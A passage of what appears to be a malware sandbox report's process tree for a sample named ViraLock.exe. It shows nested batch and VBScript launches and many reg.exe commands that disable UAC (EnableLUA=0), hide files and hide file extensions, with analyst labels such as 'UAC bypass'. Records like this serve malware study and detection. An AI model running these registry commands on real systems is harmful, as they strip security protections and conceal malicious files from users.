        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ekcsAUQs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        64⤵
        
        PID:2264
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        65⤵
        
        PID:132
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        65⤵
        
        PID:8
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        62⤵
        
        PID:836
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        62⤵
        
        PID:3148
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        63⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        62⤵
        
        PID:132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isYMoMEc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        62⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        63⤵
        System Location Discovery: System Language Discovery
        
        PID:4936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        60⤵
        Modifies registry key
        
        PID:2264
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        60⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        60⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vAAUkEUc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        60⤵
        
        PID:1956
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        61⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:404
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        61⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        58⤵
        Modifies registry key
        
        PID:3188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        58⤵
        
        PID:3028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        58⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vukkMgQQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        58⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        59⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        56⤵
        
        PID:5004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        56⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        56⤵
        UAC bypass
        
        PID:3568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LAYQQYIY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        56⤵
        
        PID:8
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        57⤵
        
        PID:3600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        54⤵
        
        PID:1260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        54⤵
        Modifies registry key
        
        PID:796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        54⤵
        
        PID:3132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lKokcYAs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        54⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        55⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        52⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        52⤵
        Modifies registry key
        
        PID:3944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        52⤵
        
        PID:3352
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ImgEQIco.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        52⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        53⤵
        
        PID:3856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        50⤵
        
        PID:644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        50⤵
        System Location Discovery: System Language Discovery
        
        PID:3568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        50⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EGEYcIcQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        50⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        51⤵
        
        PID:3472
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        48⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4548
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        48⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        48⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KaUAokwU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        48⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        49⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        46⤵
        Modifies visibility of file extensions in Explorer
        
        PID:292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        46⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        46⤵
        UAC bypass
        
        PID:1828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IMokAggk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        46⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        47⤵
        
        PID:1956
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        44⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        44⤵
        
        PID:3132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        44⤵
        UAC bypass
        Modifies registry key
        
        PID:1924
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tQgEQIcI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        44⤵
        System Location Discovery: System Language Discovery
        
        PID:3352
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        45⤵
        
        PID:644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        42⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        42⤵
        
        PID:3692
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        43⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        42⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hWcYkAsE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        42⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        43⤵
        
        PID:4648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        40⤵
        System Location Discovery: System Language Discovery
        
        PID:3472
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        40⤵
        Modifies registry key
        
        PID:2840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        40⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BesYgkUs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        40⤵
        
        PID:1444
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        41⤵
        
        PID:5004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        38⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2176
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        38⤵
        
        PID:3120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        38⤵
        Modifies registry key
        
        PID:132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iOgEEwEw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        38⤵
        
        PID:4188
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        39⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        36⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2824
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        36⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        36⤵
        Modifies registry key
        
        PID:5004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SSYIowUc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        36⤵
        
        PID:1812
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        37⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        34⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        34⤵
        Modifies registry key
        
        PID:4548
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        34⤵
        
        PID:836
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\icgAMMAQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        34⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        35⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        32⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        32⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        32⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oQkUwUMw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        32⤵
        
        PID:4120
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        33⤵
        
        PID:1004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        30⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        30⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        30⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BgEUIIUI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        30⤵
        
        PID:292
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        31⤵
        
        PID:1260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        28⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        28⤵
        
        PID:3844
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        28⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dgUscYoQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        28⤵
        
        PID:1352
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        29⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        26⤵
        
        PID:796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        26⤵
        Modifies registry key
        
        PID:1812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        26⤵
        
        PID:3572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HcIEUsMw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        26⤵
        
        PID:632
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        27⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        24⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2148
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        24⤵
        
        PID:2824
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        24⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fKgAkMcE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        24⤵
        
        PID:2064
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4076
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        25⤵
        
        PID:4528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        22⤵
        Modifies registry key
        
        PID:2264
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        22⤵
        Modifies registry key
        
        PID:4564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        22⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WSAQkAAc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        22⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        23⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        20⤵
        
        PID:3120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        20⤵
        Modifies registry key
        
        PID:3532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        20⤵
        
        PID:1352
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wiMkYEMY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        20⤵
        
        PID:3804
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        21⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        18⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        18⤵
        System Location Discovery: System Language Discovery
        
        PID:4188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        18⤵
        
        PID:3572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\icYsEYkc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        18⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        19⤵
        
        PID:3964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        16⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        16⤵
        
        PID:4548
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        16⤵
        
        PID:3844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iCsIYAEc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        16⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        17⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        14⤵
        
        PID:1844
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        14⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        14⤵
        
        PID:8
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vGUIkcss.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        14⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        15⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        12⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        12⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        12⤵
        
        PID:644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dmYEEQUY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        12⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        13⤵
        
        PID:2848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        10⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        10⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        10⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HUIUIQwQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        10⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        11⤵
        
        PID:1972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        8⤵
        
        PID:3804
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        8⤵
        Modifies registry key
        
        PID:1592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        8⤵
        UAC bypass
        
        PID:3028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\biAskgEM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        8⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        9⤵
